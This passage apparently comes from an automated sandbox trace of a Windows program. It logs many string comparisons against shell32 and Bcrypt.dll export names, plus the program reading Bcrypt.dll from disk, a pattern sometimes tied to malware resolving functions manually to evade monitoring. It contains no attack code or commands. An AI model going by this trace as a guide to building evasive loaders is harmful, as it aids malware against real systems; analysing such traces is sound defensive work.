lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0119.137] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.138] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0119.139] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0119.139] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0119.140] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0119.140] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0119.140] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0119.140] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0119.141] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0119.416] GetProcessHeap () returned 0x480000 [0119.416] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4073040 | out: hHeap=0x480000) returned 1 [0121.463] GetProcessHeap () returned 0x480000 [0121.463] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499040 [0121.463] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0121.471] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0121.471] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0121.471] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0121.471] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0121.472] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0121.472] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0121.472] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0121.472] GetProcessHeap () returned 0x480000 [0121.472] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x26fa0) returned 0x2cb2010 [0121.474] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0121.474] ReadFile (in: hFile=0x15c, lpBuffer=0x2cb2010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cb2010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0121.487] CloseHandle (hObject=0x15c) returned 1 [0121.487] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0121.487] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0121.487] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0121.487] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0121.487] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.487] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0121.487] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0121.487] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.488] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.488] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0121.488] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0121.488] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.488] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.488] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0121.488] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0121.488] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0121.488] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0121.488] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0121.488] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0121.489] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0121.489] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0121.489] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0121.489] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0121.489] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.489] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0121.490] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0121.491] lstrcmpA 